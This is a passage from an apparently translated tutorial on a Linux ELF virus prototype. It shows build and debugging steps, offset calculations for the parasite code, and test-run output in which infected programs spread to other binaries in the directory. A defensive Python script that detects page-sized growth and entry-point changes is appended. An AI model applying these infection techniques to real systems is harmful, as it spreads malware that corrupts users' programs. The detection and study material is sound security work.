How a Linux virus prototype works: the process and its key steps

5. Debugging procedure in the new build environment

  grip2@linux:~/tmp/virus> ls
  g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c
  Makefile parasite-sample.c parasite-sample.h

Adjust the Makefile so that it builds in debug mode, i.e. turn off the -DNDEBUG option (it is commented out below):

  grip2@linux:~/tmp/virus> cat Makefile
  all: foo gei

  gei: g-elf-infector.c gvirus.o
  	gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG

  foo: foo.c
  	gcc $< -o foo

  gvirus.o: gvirus.c
  	gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG

  clean:
  	rm *.o -rf
  	rm foo -rf
  	rm gei -rf

Build the code:

  grip2@linux:~/tmp/virus> make
  gcc foo.c -o foo
  gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
  gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG

First obtain the length of the parasite code (the -l switch prints it), then adjust the #define PARACODE_LENGTH definition in gvirus.c accordingly:

  grip2@linux:~/tmp/virus> ./gei -l
  Parasite code length: 1744

Get the start address of the parasite code and the address of the 0xaabbccdd placeholder, and from them compute the offset of the location that holds the return address:

  grip2@linux:~/tmp/virus> objdump -d gei | grep aabbccdd
  8049427: 68 dd cc bb aa push $0xaabbccdd
  grip2@linux:~/tmp/virus> objdump -d gei | grep ""
  08048d80 :
  8049450: e9 2b f9 ff ff jmp 8048d80
  grip2@linux:~/tmp/virus> objdump -d gei | grep ":"
  08048d80 :

Subtracting 0x8048d80 from 0x8049427 gives the offset we need (0x6a7); use this value to update the #define PARACODE_RETADDR_ADDR_OFFSET macro in gvirus.h.

Rebuild:

  grip2@linux:~/tmp/virus> make clean
  rm *.o -rf
  rm foo -rf
  rm gei -rf
  grip2@linux:~/tmp/virus> make
  gcc foo.c -o foo
  gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
  gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
  grip2@linux:~/tmp/virus> ls
  gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
  g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h

Create a test directory and try it out:

  grip2@linux:~/tmp/virus> mkdir test
  grip2@linux:~/tmp/virus> cp gei foo test
  grip2@linux:~/tmp/virus> cd test
  grip2@linux:~/tmp/virus/test> ls
  gei foo
  grip2@linux:~/tmp/virus/test> cp foo h

Produce the infected program (gei prints the host's ELF header fields before patching it; note that h grows by exactly 4096 bytes):

  grip2@linux:~/tmp/virus/test> ./gei h
  file size: 8668
  e_phoff: 00000034
  e_shoff: 00001134
  e_phentsize: 00000020
  e_phnum: 00000008
  e_shentsize: 00000028
  e_shnum: 00000025
  text segment file offset: 0
  [15 sections patched]
  grip2@linux:~/tmp/virus/test> ll
  total 44
  -rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
  -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo

Run the infected program (after it returns, both gei and foo in the directory have grown by 4096 bytes):

  grip2@linux:~/tmp/virus/test> ./h
  .
  ..
  gei
  foo
  h
  .backup.h
  real elf point
  grip2@linux:~/tmp/virus/test> ll
  total 52
  -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo

Check whether running the infected program above has infected the other ELF programs (already-infected files are skipped with "Better luck next file"):

  grip2@linux:~/tmp/virus/test> ./foo
  .
  ..
  gei
  Better luck next file
  foo
  h
  Better luck next file
  .backup.h
  Better luck next file
  real elf point

OK, it works. Copy a clean foo from the parent directory in as hh and run the infected foo again to see the new file get picked up:

  grip2@linux:~/tmp/virus/test> cp ../foo hh
  grip2@linux:~/tmp/virus/test> ll
  total 64
  -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
  -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh
  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
  grip2@linux:~/tmp/virus/test> ./foo
  .
  ..
  gei
  Better luck next file
  foo
  h
  Better luck next file
  .backup.h
  Better luck next file
  hh
  real elf point
  grip2@linux:~/tmp/virus/test>
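The observable left behind by the test run above is a host that grew by exactly one 4096-byte page while its header fields moved. The following added defender-side example (not code from the original post or the gei project) parses the ELF32 header fields that gei prints, compares a pre- and post-infection image, and flags a host whose size grew by a whole page and whose entry point changed. Both images are constructed inside the script; the entry addresses and section-header offsets are assumed values chosen to mirror the page's numbers, not read from real binaries.

```python
import struct

# ELF32 header layout: e_ident[16] followed by the fixed-size fields, in order.
ELF32_EHDR = "<16sHHIIIIIHHHHHH"
EHDR_FIELDS = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff",
               "e_flags", "e_ehsize", "e_phentsize", "e_phnum", "e_shentsize",
               "e_shnum", "e_shstrndx")

def elf32_header(data):
    """Parse a 32-bit ELF header into a dict (the fields gei prints, plus the rest)."""
    if len(data) < struct.calcsize(ELF32_EHDR) or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1:                      # EI_CLASS must be ELFCLASS32
        raise ValueError("only ELF32 is handled here")
    values = struct.unpack_from(ELF32_EHDR, data, 0)[1:]   # skip e_ident
    return dict(zip(EHDR_FIELDS, values))

def compare_elf(before, after):
    """Report every header field that changed between two images, plus the size delta."""
    hb, ha = elf32_header(before), elf32_header(after)
    changed = {k: (hb[k], ha[k]) for k in EHDR_FIELDS if hb[k] != ha[k]}
    return {"size_delta": len(after) - len(before), "changed": changed}

def suspicious(before, after):
    """Heuristic from the page's observation: size grew by a whole page AND e_entry moved."""
    r = compare_elf(before, after)
    return r["size_delta"] > 0 and r["size_delta"] % 4096 == 0 and "e_entry" in r["changed"]

def build_elf(entry, shoff, total_size):
    """Constructed ELF32 image: a valid header (no real code), zero-padded to total_size."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)   # ELFCLASS32, little-endian, version 1
    hdr = struct.pack(ELF32_EHDR, ident, 2, 3, 1, entry, 0x34, shoff, 0,
                      0x34, 0x20, 8, 0x28, 0x25, 0x24)   # phnum/shnum as gei printed them
    return hdr.ljust(total_size, b"\0")

# Constructed pair: sizes and e_shoff follow the page (8668 -> 12764, 0x1134 shifted by
# one page); the two entry addresses are assumed values, not taken from the page.
CLEAN = build_elf(0x8048320, 0x1134, 8668)
INFECTED = build_elf(0x8049320, 0x2134, 12764)

if __name__ == "__main__":
    print(compare_elf(CLEAN, INFECTED))
    print("suspicious:", suspicious(CLEAN, INFECTED))
```

In practice the "before" image would come from a stored baseline (size plus hash) taken when the binary was installed, which is also the cheapest way to notice that gei and foo themselves changed size after h ran.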

6. Summary

Since I am neither a virus coder nor an anti-virus coder, my grasp of virus techniques is bound to have gaps. If the description of the virus techniques in this article is inaccurate or the analysis falls short, please point it out. Thank you.